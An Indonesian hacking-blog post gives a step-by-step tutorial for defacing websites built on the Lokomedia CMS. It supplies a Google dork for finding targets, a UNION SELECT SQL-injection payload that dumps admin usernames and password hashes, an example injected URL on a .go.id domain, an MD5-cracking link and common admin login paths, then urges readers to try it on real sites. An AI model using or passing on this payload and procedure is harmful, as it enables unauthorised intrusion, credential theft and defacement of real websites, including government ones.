^_^ Assalamualaikum ^_^
Maaf Baru Ngepost lagi , Jaringan lelet + udah bosan ngeblog lagi -_- .
Mumpung jringan cepet sekarang saya akan bagikan kepada agan" "Tutorial Deface Dengan SQLI Lokomedia Vulnerable" .
Klau Begitu langsung saja baca yuk . Cekidot :D
Dork : inurl:statis-1-profil.html (kembangin lgi biar dapat bnyak)
exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
Langsung sja gunakan dork diatas menggunakan search engine (google.com) .
Klau sudah dapat Targetnya contoh kyak gini nih Mas Mbah .
www.site.go.id/statis-1-profil.html
Langsung saja masukkan exploit diatas
www.site.go.id/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html
Nanti username dan password adminnya keliatan tuh di title webnya .
kyak gini .
Kan disitu tdk keliatan jelas passnya klau mau liat fullnya tambahkan "view-source:" Contoh kek gini.
Tuh kan Udah keliata user dan pass adminnya^_^
Tapi passwordnya msih berbentuk md5 -_- terpaksa hrus di hash dulu mas mbah ^_^
Link hash md5 : https://hashkiller.co.uk/md5-decrypter.aspx
Sisa cari saja sendiri halaman loginnya , contoh :
www.site.go.id/adminweb | www.site.go.id/administrator | www.site.go.id/admin | www.site.go.id/redaktur
Ok gitu aja basa basinya om :D
Langsung aja di praktekin :v . Jangan lupa tetap coli di rumah :V
Thanks To : Sec7or Team | Bang Andra | PhantomGhost Team | Sulawesi IT Sec
0 Comment to "Tutorial Deface Dengan SQLI Lokomedia Vulnerable"
Posting Komentar